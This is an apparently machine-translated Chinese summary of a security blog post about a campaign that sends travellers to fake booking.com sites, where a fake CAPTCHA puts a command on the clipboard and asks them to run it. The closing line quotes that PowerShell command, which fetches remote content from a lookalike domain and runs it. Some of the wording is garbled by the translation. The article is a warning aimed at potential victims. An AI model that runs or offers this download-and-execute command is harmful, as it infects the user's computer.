详细内容或原文请订阅后点击阅览
受害者被重定向到假booking.com网站
我们发现,网络犯罪分子正在为即将到来的假期做准备,并通过重定向运动导致异步。
来源:Malwarebytes Labs 博客网络犯罪分子已经发起了一项活动,重定向游戏网站和社交媒体上的链接(以及作为赞助的广告),这导致了伪造的网站,以booking.com的形式摆姿势。根据Malwarebytes Research的说法,有40%的人通过一般的在线搜索旅行,为骗子创造了很多机会。
研究该活动的第一个迹象出现在5月中旬,最后一次重定向目的地每两到三天更改。
按照链接将访客带入熟悉的策略,在该策略中,假验证码网站劫持了您的剪贴板,并尝试欺骗访客感染自己的设备。
在这些网站上像往常一样,通过在伪造的验证码提示中放置一个Chectmark,您将授予网站许可将某些内容复制到剪贴板上。
之后,所涉及的骗子将尝试让访问者在其计算机上执行运行命令。这种提示从不用于合法的验证验证表格,应立即对所有人怀疑。
如果您使用的是Chrome,则可能会看到此警告:
警告很好,但我认为这是什么警告是什么。
Malwarebytes的浏览器护板的用户将看到此警告:
“嘿,你只是复制了东西吗?
抬头,您的剪贴板刚刚从此网站访问。在经过这个地方之前,请确保您信任所有者。像终端或给老板的电子邮件。”
好吧,无论哪种方式,都不要只是丢弃这些警告。即使您认为自己正在查看实际的预订网站,也不是您期望遵循的说明。
网站刚刚放在剪贴板上的内容可能看起来像某些人,尽管经验丰富的用户会看到危险。
powershell -noprofile -windowstyle隐藏-command“ $ banp ='bkngnet.com'; $ rkv = invoke -restmethod -uri $ banp; invoke -expression $ rkv”